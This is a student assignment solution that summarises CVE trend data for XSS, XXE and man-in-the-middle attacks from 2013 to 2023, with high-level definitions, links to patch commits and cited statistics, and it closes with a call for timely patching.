DA5. Web Attacks Impact¶
Statement¶
Year after year, several cyber attacks on web applications are on the rise. Conduct an online search to find the latest data (within 12 years of the current date) on XSS (XXE) and Man-in-the-Middle attacks, and:
- Review the data.
- Prepare your interpretation.
- Derive the conclusion of your interpretation. Support the case with external research references.
Solution¶
Introduction¶
Web application security is an ever-increasing problem as all societies are becoming more and more web-dependent. As the chart below suggests; the number of vulnerabilities is increasing year after year, and they are now at 6 folds of what they were 10 years ago (CveDetails, 2023, 1).
Total number of vulnerabilities 2013-2023 (CveDetails, 2023, 1)
XSS¶
XSS (Cross-Site Scripting) is an attack a client-side injection of a malicious script into the web page (and may be saved to the server), the purpose of this attack is to steal user credentials (cookies, session tokens, passwords, etc); when the script is executed, these details are sent to the attacker. The chart below shows the number of XSS vulnerabilities that were published in 2013-2023 (CveDetails, 2023, 1), and we can see that the number of XSS vulnerabilities is now almost 7-8 times what it was 10 years ago.
XSS vulnerabilities 2013-2023 (CveDetails, 2023, 1)
Here are a few examples of some of the recent XSS attacks (Toulas, 2023, 3):
- Zimbra Web Client: discovered in July 2023, but still affecting some clients as not all users have updated. The source of the issue is the lack of input sanitization, and here is the fix: https://github.com/Zimbra/zm-web-client/pull/827/commits/4d563480a73c806617b3da7b457ef65861ea2b9f
- Xwiki Platform: discovered in Aug 2023, and it is considered a critical vulnerability; it is also due to the lack of URL sanitization; here is the fix: https://github.com/xwiki/xwiki-platform/commit/5e14c8d08fd0c5b619833d35090b470aa4cb52b0 (CveDetails, 2023, 2)
XXE¶
XXE (XML External Entity) is an attack that exploits the XML parser to access sensitive information, execute remote code, and perform denial-of-service attacks. The chart below shows the number of XXE vulnerabilities that were published in 2013-2023 (CveDetails, 2023, 1), and we can see that the number of XXE vulnerabilities increased year-over-year till 2018, then it dropped significantly up to 2020, and now it is increasing again is a slow pace.
XXE vulnerabilities 2013-2023 (CveDetails, 2023, 1)
MITM¶
MITM (Man in the Middle Attack) is an attack where the attacker secretly listens (and maybe alters) the communication between two parties. The danger of MITM is that it leads to the exploitation of vulnerabilities; as listening to connections gives the attacker information about the state of the connection and if other vulnerabilities are available.
Here are some interesting facts about MITM attacks (Astra Security Blog, 2023, 4):
- MITM attacks account for 19% of all cyber-attacks.
- The costs of MITM attacks exceeded $2 billion in 2020.
- 50% of MITM attacks target banks and financial institutions.
Conclusion¶
We saw how common web attacks are, and how severe their consequences are; It is important to educate end-users and software professionals alike to keep their software up-to-date and to be aware of the latest security threats; as the delay of applying security patches makes your infrastructure vulnerable for exploitation, and thus successful attacks.
References¶
-
CveDetails. (2023). Vulnerabilities by type. CVE security vulnerability database. Security vulnerabilities, exploits, references and more. Cvedetails.com. https://www.cvedetails.com/vulnerabilities-by-types.php ↩↩↩↩↩↩
-
CveDetails. (2023). XSS 2023. Security vulnerabilities, CVEs, XSS, and cross-site scripting were published in 2023. (2023). Cvedetails.com. https://www.cvedetails.com/vulnerability-list/year-2023/opxss-1/xss.html ↩
-
Toulas, B. (2023). Latest XSS news. BleepingComputer; BleepingComputer. https://www.bleepingcomputer.com/tag/xss/ ↩
-
Astra Security Blog. (2023). How Many Cyber Attacks Per Day: The Latest Stats and Impacts in 2023. Astra Security Blog. https://www.getastra.com/blog/security-audit/how-many-cyber-attacks-per-day/ ↩